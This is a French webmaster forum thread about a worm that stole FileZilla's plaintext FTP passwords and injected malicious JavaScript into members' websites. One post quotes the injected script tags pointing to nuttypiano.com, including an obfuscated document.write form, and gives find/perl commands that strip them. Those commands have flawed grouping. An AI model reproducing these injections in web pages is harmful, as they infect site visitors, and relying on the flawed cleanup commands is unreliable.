là où le dev de filezilla s'oppose à l'encryptage c'est qu'il suppose que cela ne servira à rien car un keylogger récupérera le mot de passe maître facilement, or c'est considérer par avance que les utilisateurs ne se rendront pas compte que leur pc a été corrompu et continueront à l'utiliser sans nettoyer. Je trouve que c'est un peu se moquer de ses utilisateurs en supposant qu'ils sont incapables de sécuriser leur PC (je suspecte là encore une vieille gueguerre stupide Win vs Lin) !

Sachant que ceux qui sont le plus sensibles à cette faille sont justement les plus gros utilisateurs, qui ont réellement besoin d'un gestionnaire de mots de passe efficace, et pour lesquels se faire voler les mots de passe est une catastrophe, l'impact d'un vol de mots de passe est énorme : 200 sites vérolés, multiplié par le nombre de visiteurs cumulé, on arrive rapidement à un déploiement exponentiel de la menace !
Là où l'encryptage du fichier aurait probablement fortement limité les risques.
J'ai lu un article intéressant d'un webmaster infecté par cette menace : il a constaté que son serveur avait été attaqué en 1h30 au total (ce que j'ai constaté moi aussi : virus à 8h30, pages corrompues sur mes sites à 10h), et que 8 adresses avaient participé à l'attaque, chacune réalisant une tâche précise. Un vrai réseau organisé, efficace et automatisé.
Je pense que si le temps requis pour un brute-force sur le fichiers de mots de passe s'était élevé à quelques dizaines de minutes le réseau pirate aurait laissé tomber. Et quand on a 200 sites sous sa garde on ne lésinne pas avec les mots de passe !

On a déjà parlé de l'utilisation d'un gestionnaire de mots de passes différents de filezilla (sur le site français Roboform est même mis fortement en avance ! comme quoi l'équipe française reconnait un risque) mais ça n'est pas réaliste en pratique, la perte de temps cumulée au quotidien est énorme au final.
Si le dev continue de refuser d'entendre ces arguments (qui reviennent depuis plus d'un an) je changerai définitivement de logiciel FTP.
 
WRInaute accro
finstreet a dit:
mipc a dit:
on l'imprime sur une feuille de papier

hum hum hum Premier truc qu'on dit de ne pas faire dans les sociétés. Un mot de passe ca ne s'imprime JAMAIS. Pourquoi pas mettre une étiquette sous le clavier aussi ou alors directement sur l'écran.

une feuille de papier bien ranger, et toujours à porter est bien plus sécurisé et pis va pirater un feuille de papier hein que tu sais même pas qu'elle existe, et pis c'est une sécurité supplémentaire.


si chez toi c'est bien sécuriser et que y a pas de cambriolage une feuille de papier c'est bien plus sécurisé, surtout va récupérer les MDP complexe que tu aura générer, lors qu'un petit malin aura crypter tous tes fichiers et qu'il te dira que si tu veux récupérer tes données d'envoyer 100 000EUROS sur un compte dans un pays lointain, et puis dans le cas ou quelqu'un te vole tous tes disque dur, le pire c'est le portable voler avec tous les MDP en clair dans un fichier, et ne me parler pas de la session windows c'est le truc le plus simple à casser en même pas 30 secondes.

ou alors ta pas fait de sauvegarde online ou via disque dur USB ou mirorring et tous bêtement ton unique Disque dur est mort HS, du coup au mieux tu es au chômage technique quelque jours, au pire tu peux dire a dieu à tes MDP et la plus part de tes fichier de travail, le pire c'est que dans bien des cas soit tu n'ai pas de sauvegarde online sécurisé, soit ta/tes sauvegardes dates un peux, soit pire ton MDP et login de ton compte de sauvegarde online était dans ton unique disque dur et comme tu ne les connais pas tu ne peux pas aller sur ta sauvegarde online car ton MDP est trop long et trop complexe à retenir.
 
WRInaute accro
mipc a dit:
une feuille de papier bien ranger, et toujours à porter est bien plus sécurisé et pis va pirater un feuille de papier hein que tu sais même pas qu'elle existe, et pis c'est une sécurité supplémentaire.

Je te parle de vraies sociétés informatiques et pas de mecs qui bossent dans leur garage avec tous les risques que ca implique. Et c'est l'un des premiers trucs que tu apprends : n'écris nul part tes mots de passe. Les "visites" d'entreprises c'est ultra courant en matière d'espionnage industriel
 
WRInaute passionné
Bon, en passant j'ai concocté une commande shell qui nettoie en profondeur les impuretés laissées par les méchants scripts kiddies.

Etape 1 - SECURITE
- sécuriser l'hébergement (changement de mots de passe, amélioration de la sécurité du site, ... voire par ailleurs les bonnes pratiques, il y a de bonnes pages là dessus )

Etape 2 - IDENTIFICATION
a/ identifier quels sont les fichiers impactés durant les 5 derniers jours (je vise large !) :
Code:
find . -ctime 5 -name "*.htm" -o -name "*.js" -o -name "*.html" -o -name "*.php"

b/ chercher ceux qui ont été modifiés durant les dernières 48h et qui contiennent *éventuellement* un code javascript malicieux :
Code:
find . -ctime 2 -name "*.htm" -o -name "*.js" -o -name "*.html" -o -name "*.php" -print | xargs grep http.*js

"http" car évidemment ce sont des fichiers externes et "js" car ce sont les fichiers javascript qui vont permettre d'afficher plein de conneries.

Là, on aura les lignes telles que :
Code:
<script type="text/javascript" src="hxxp://nuttypiano.com/LinkedIn.js"></script>
dans les fichiers .html et .php
et

Code:
document.write('<sc'+'ript type="text/javascript" src="hxxp://nuttypiano.com/LinkedIn.js"></scri'+'pt>');
dans les fichiers .js
notez les méchantes URLs telles que "nuttypiano"...

c/ sauvegarder (indispensable !!!!!!!!!!!!!!!!!), car ...

Etape 3 - NETTOYAGE

... on va supprimer les lignes contenant les commandes malicieuses.
Pour ma part :
Code:
find . -name "*.htm" -o -name "*.js" -o -name "*.html" -o -name "*.php" | xargs perl -pi -e 's/^.*(nuttypiano|pocketbloke|crispybattle).*$//g'
et
Code:
find . -name "*.htm" -o -name "*.js" -o -name "*.html" -o -name "*.php" | xargs perl -pi -e 's/^.*\--[0-9a-zA-Z]*-->.*$//g'

Dans le détail : je cherche tous les fichiers htm, html, js et je supprime les lignes contenant un des domaines indiqués. Ensuite je supprime les lignes telles que <!--84329826a28d135e5921b0f9de20d204--> qui identifient que le fichier a déjà été hacké mais surtout cette ligne perturbe les fichiers PHP qui n'ont pas de balise ?> fermante... et oui, tant qu'on ne ferme pas la balise PHP, on reste dans le PHP. Et cette ligne ne fait pas partie du PHP !

Easy ! Rock'n'roll !

ps : j'applique le nettoyage à tous les fichiers, pas qu'à ceux qui ont été modifiés durant les 5 derniers jours
pps : le script ne fonctionne pas pour les fichiers (et répertoires ?) comportant un espace... Si un expert en script shell passe par là, qu'il n'hésite pas !
 
Nouveau WRInaute
+1 pour la procédure de nettoyage !

A problèmes similaires solutions quasi similaires ... j'ai trouvé sur le net un script php qui fait le nettoyage de manière similaire.
Il va rechercher de manière récursive tous les fichiers contenant un bout de code et efface ce code.
Cela sous-entend que vous avez déjà récupéré quelques fichiers html et js et que vous connaissez le code à effacer (cf. là encore le post de Loran : il y a les deux typologies de code : pour les fichiers html et pour les fichiers js).

Le script ne fonctionne pas tout le temps donc il faut parfois revenir à une méthode plus scriptée.
Je tiens le fichier à dispo, si certains en ont besoins n'hésitez pas à m'envoyer un MP.

Au passage si vous êtes de ceux qui pensent que Filezilla devrait stocker ses mots de passe de manière sécurisée, et que vous avez des arguments pour le défendre, n'hésitez pas à venir faire un tour sur le forum officiel de Filezilla : forum.filezilla-project.com
Le problème a été soulevé l'année dernière déjà (au moins), et au vue de la manière dont l'attaque s'est déroulée pour moi si le développeur avait crypté la base à l'époque je n'aurais probablement pas eu à réparer mes sites.
 
WRInaute occasionnel
@loran750

C'est pas nouveau la sauvegarde non crypté des pass dans FZ.

Et pour ta gouverne, FZ qui ne crypte pas les pass est installé sur un PC qui doit être contrôlé, sécurisé, désinfecté, etc...
Si les gens sont trop bête pour ne pas comprendre ça, c'est leur problème. Ca fait juste 20 ans qu'on explique aux gens que les virus ça existe en informatique.

... et maintenant, que pense tu de tous les forum, jeux, bref inscriptions que tu fais sur internet sans n'avoir absolument aucune certitude sur ce qui est fait de tes passe et login ?
Qui te dis que sur wri, les pass sont crypté ? (c'est pas une critique ou une accusation, mais juste un exemple.)
 
Nouveau WRInaute
loran750 a dit:
Dans le détail : je cherche tous les fichiers htm, html, js et je supprime les lignes contenant un des domaines indiqués. Ensuite je supprime les lignes telles que <!--84329826a28d135e5921b0f9de20d204--> qui identifient que le fichier a déjà été hacké mais surtout cette ligne perturbe les fichiers PHP qui n'ont pas de balise ?> fermante... et oui, tant qu'on ne ferme pas la balise PHP, on reste dans le PHP. Et cette ligne ne fait pas partie du PHP !

Petite précision supplémentaire à l'attention de ceux qui ne sont pas développeurs et qui liront ce post : comme le dit Loran cette balise perturbe les scripts qui n'ont pas de balise fermante PHP, mais potentiellement aussi ceux qui en ont une, en particulier ceux qui sont exécutés avant l'envoi des premiers messages au navigateur. Il faut donc penser à nettoyer cette balise et les éventuels caractères espace ou retour chariot qui la séparent de la balise fermante du fichier PHP, sinon risque de Warning.
Je pense en particulier aux fichiers index.php des templates joomla (pour ne citer qu'eux)
 
WRInaute impliqué
Cela a surement déjà été dit mais quand son propre ordinateur est infecté on risque effectivement "gros".

A cela s'ajoute :
Les pass des sites dispo en cookie. Lisible.. aisément.


Pas de la faute de Filezilla si tu choppe un trojan ( "tu" = général. )
 
Nouveau WRInaute
@Ehplod et @nervusdm :
Le problème est précisément que malgré un pc sécurisé, malgré un utilisateur pas trop bête, malgré aucune pièce jointe douteuse cliquée, le ver est rentré dans le fruit et des données ont été volées (et je ne suis pas le seul).

Pourquoi parler plus de Filezilla que des cookies du forum machin ? Parce que le fichier du sitemanager de filezilla EST le but de ce ver, il s'en moque des cookies machin qui permettent d'accéder au forum truc, parce que ce qui l'intéresse c'est filezilla.
Et pourquoi Filezilla ? Parce que par définition il contient des mots de passe de site web, lesquels sites web pourront être corrompus dans l'heure et participer à la prolifération du ver.

Elle a beau dos la sécurisation du poste de travail, mais elle n'est pas toujours efficace à 100%. Son but est d'être efficace 99.999% du temps, mais elle ne peut pas toujours être efficace pendant le 1000° de seconde où le ver a pu profiter de la faille pour voler un fichier. Heureusement cela arrive quand même rarement, mais ça arrive.
Et non, ça n'arrive pas qu'aux autres.

C'est pas la faute de Filezilla si t'as pas de bol de tomber sur la mauvaise page au mauvais moment, mais depuis le temps que ça arrive ils auraient pu bouger.
Chaque application a quand même une part de responsabilité dans la sécurisation de ses propres données.
 
WRInaute passionné
@Ehplod : avant d'accuser les gens de bêtise, il faudrait que tu te renseignes pourquoi ils font telle ou telle chose. C'est insultant. Quant à FZ, évidemment que non, je ne savais pas que les pwd étaient en clair...
Ensuite, pour les sites web sur lesquels je m'inscris et pour lesquels ce n'est pas important (=ni info personnelle ni carte de crédit entrée), j'utilise quelques user/mdp dédiés au sites internet voire même des comptes mails instantanés.
 
WRInaute accro
oui, mais là, si un js seul arrive à télécharger un fichier en local, ce n'est pas un problème de filezilla, pas un énorme problème de sécurité au niveau du navigateur : le navigateur ne peut accéder aux fichiers locaux (hormis les applet java signées que l'on a acceptées).
Donc ce n'est pas au développeur de filezilla qu'il faut s'en prendre, mais à ceux de IE et de FF
 
WRInaute occasionnel
Hello chers et éminents Wrinautes. :D

Je me permet juste de vous rappeler que la sécurité est une chaine. Elle ne vaut que le plus faible de ses maillons.

Ce n'est pas telle application contre telle autre mais telle appli et telle autre.

Ce n'est pas sécurité du système contre sécurité des applications (en particulier celle qui stockent des mots de passe et des adresses associées) mais bien un ensemble.

Il suffit d'un maillon faible pour se faire avoir. Si toutes les couches sont traitées avec le sérieux requis, la pénétration est beaucoup plus difficile.

Cordialement, Éric.
 
WRInaute impliqué
Arkhee a dit:
Au passage si vous êtes de ceux qui pensent que Filezilla devrait stocker ses mots de passe de manière sécurisée, et que vous avez des arguments pour le défendre, n'hésitez pas à venir faire un tour sur le forum officiel de Filezilla : forum.filezilla-project.com
Le problème a été soulevé l'année dernière déjà (au moins), et au vue de la manière dont l'attaque s'est déroulée pour moi si le développeur avait crypté la base à l'époque je n'aurais probablement pas eu à réparer mes sites.

Pas la peine, j'ai lu les discussions qui datent de plusieurs années, le codeur en chef est un autiste.
 
Nouveau WRInaute
VisitezMonSite a dit:
Arkhee a dit:
Au passage si vous êtes de ceux qui pensent que Filezilla devrait stocker ses mots de passe de manière sécurisée, et que vous avez des arguments pour le défendre, n'hésitez pas à venir faire un tour sur le forum officiel de Filezilla : forum.filezilla-project.com
Le problème a été soulevé l'année dernière déjà (au moins), et au vue de la manière dont l'attaque s'est déroulée pour moi si le développeur avait crypté la base à l'époque je n'aurais probablement pas eu à réparer mes sites.

Pas la peine, j'ai lu les discussions qui datent de plusieurs années, le codeur en chef est un autiste.

+18
c'est le nombre de requêtes fermées sur le trac de filezilla et portant sur la sécurisation du sitemanager.


@leonick : si tu te fais vider ta maison tu fais un procès à la police parce qu'ils n'ont pas pu empêcher les voleurs ? on est face à une bande organisée qui cible les failles de windows dans le but de voler les mots de passe filezilla, ce fait est connu, soulevé sur le forum depuis des années (au minimum depuis 2009) mais le dev ne fait rien car il s'appuie sur la sécurisation du système d'exploitation. Or c'est rarement l'OS qui est en jeu, mais plus souvent des plugins tiers : acrobat reader, flash, java etc. Non pas dans leur usage classique mais en les faisant planter d'une certaine manière tu accèdes au système avec leurs droits ou mieux.
Sérieusement si une bande de fous-furieux essaye de venir chez toi te vider ton portefeuille tu fais aveuglément confiance à ta porte blindée ? est-ce que tu ne penseras pas à mettre des barreaux aux fenêtres ? voire un coffre pour cacher tes bijoux de famille (enfin, ceux de ta femme) ? N'importe quel développeur penserait un minimum à proposer une fonction "coffre" pour ses utilisateurs, car n'importe quel développeur saurait que la porte peut être forcée, même si celle-ci n'est pas de leur responsabilité.
 
WRInaute passionné
Je propose qu'on conclue ce fil de discussion parce que nous dérivons un peu.

- d'un côté nous avons les personnes qui pensent que la sécurité doit être assurée sur toute la chaine, et qui sont capable de la maintenir, qui sont suffisamment compétents pour la maintenir.
- d'un autre, nous avons aussi des personnes qui pensent que la sécurité doit être assurée sur toute la chaine, mais qui ne font pas confiance à un sous-ensemble de cette chaine (pour plein de raisons).

Pour les premiers, Filezilla est un des derniers éléments de la chaine, et il n'y a pas lieu de plus sécuriser que cela leur poste de travail.
Pour les seconds, Filezilla est à un endroit non défini de la chaine, et il convient alors d'accroitre la sécurité en changeant d'outil FTP en prenant en compte les aspects suivants :
- un logiciel de FTP qui permet de faire du sFTP
- un logiciel de FTP qui crypte les mots de passe OU BIEN l'absence d'enregistrement des mots de passe automatiquement.


En l'occurence, WinSCP est un logiciel parmi d'autres qui convient pour remplacer Filezilla. En voyez-vous d'autres ? (convivialité, fonctionnalités, ergonomie)

Une autre conclusion ?
 
Nouveau WRInaute
cuteFTP : payant mais possède un gestionnaire de sites digne de ce nom (contrairement à winscp)
FireFTP : plugin de Firefox, dispose des mêmes sécurités que Firefox, gestionnaire de site limité
 
WRInaute accro
déjà Filezilla ou pas, je dé-conseil le FTP, mieux vaut le SSH et des MDP long et complexe avec des codes ASCII genre ALT+24 ou ALT+255 et bien d'autres bien relou et dont personne ne pense, en tous cas pas un MDP ou login qui permettrait de passer en mode bruteforce(tester toutes les MDP possible) via des ferme de PC Zombie, et/ou autres dictionnaires.

aussi regarder régulièrement les fichiers de LOG, ou créer une routine pour dire au serveur FTP, lorsque qu'un personne se connecte envoyer un E-mail avec la DATE l'heure et l'IP de celui qui tente de se loger, et à plus forte raison sur les tentatives de connexion échouer pour un problème de MDP ancien ou mauvais, de même que pour le login.

aussi on peux configurer le serveur pour qu'il n'autorise que certains IP publique à se connecter, après si non y a les certificats et interdire de se connecter au serveur en mode FTP et même sFTP.

changer de MDP souvent, pareil pour les logins, et scruté les tentative de connexion avec des MDP et/logins ancien et invalide.
 
WRInaute accro
Arkhee a dit:
cuteFTP : payant mais possède un gestionnaire de sites digne de ce nom (contrairement à winscp)
FireFTP : plugin de Firefox, dispose des mêmes sécurités que Firefox, gestionnaire de site limité
et étant donné que, visiblement, les scripts js qui ont téléchargé les fichiers ont été exécutés via firefox, ça veut dire aucune sécurité donc pour fireftp
 
WRInaute accro
on peut mettre un MDP pour les complétions automatique des MDP, et on peux dire à firefox de bloquer l'accès au MDP par un MDP unique, bon bien sur on en viens toujours au virus keyloger ou là ça ne sert à rien.
 
WRInaute accro
mipc a dit:
déjà Filezilla ou pas, je dé-conseil le FTP, mieux vaut le SSH in.

aussi on peux configurer le serveur pour qu'il n'autorise que certains IP publique à se connecter, après si non y a les certificats et interdire de se connecter au serveur en mode FTP et même sFTP.

changer de MDP souvent, pareil pour les logins, et scruté les tentative de connexion avec des MDP et/logins ancien et invalide.

En sftp sur un mutu je trouve que c'est très très long. Non ?
 
WRInaute accro
sinon, une solution un peu plus "secure", consisterait à envoyer ses fichiers en ftp dans une zone hors http, puis ensuite de faire la copie ou l'install en ssh
 
WRInaute accro
polweb a dit:
mipc a dit:
déjà Filezilla ou pas, je dé-conseil le FTP, mieux vaut le SSH in.

aussi on peux configurer le serveur pour qu'il n'autorise que certains IP publique à se connecter, après si non y a les certificats et interdire de se connecter au serveur en mode FTP et même sFTP.

changer de MDP souvent, pareil pour les logins, et scruté les tentative de connexion avec des MDP et/logins ancien et invalide.

En sftp sur un mutu je trouve que c'est très très long. Non ?

chai pas sur le miens depuis filezilla chui en SSH est c'est rapide, bon la première connexion est lente, mais après une fois connecter la vitesse est normal sans plus chui à 90KO/s de moyenne.


edit: Transfert de fichier réussi, transféré 10 567 680 octets en 118 secondes.
 
WRInaute accro
Je ne suis pas d'accord sur l'affirmation que la sécurité dépend du maillon le plus faible de la chaîne.
Si le navigateur n'ouvre pas un fichier exécutable, si l'anti-virus s'interpose pour l'empêcher de s'exécuter, et si le système lui interdit de s'installer, on peut bien mettre tous les codes dans un fichier txt sur le bureau et ils ne seront pas hackés.
Si les trois conditions ne sont pas réunies, aucun système de cryptage n'empêchera le hack une fois la porte ouverte et le pc à la libre disposition du hacker.
 
WRInaute accro
+1
la sécurité dépend du cumul de plein de maillons inopérationnels.
Pourquoi se retourner sur le constructeur de maisons qui n'a pas mis de portes blindées à l'intérieur des maisons (je ne parle pas de la porte extérieure, mais de toutes les portes intérieures), alors que la maison est dans une enceinte sécurisée, avec un gardien et qu'en plus, il y a un système de téléalarme.
 
Nouveau WRInaute
Mouais, là on serait plutôt dans le cas d'un musée, avec un gros brillant au comme clou du spectacle, et des voleurs partout dans le monde qui ont les yeux qui brillent rien que d'y penser.
En général le propriétaire du diamant ne fait pas 100% confiance aux portes blindées et prévoit quelque chose au cas où ça n'ait pas suffi.
 
Discussions similaires
Haut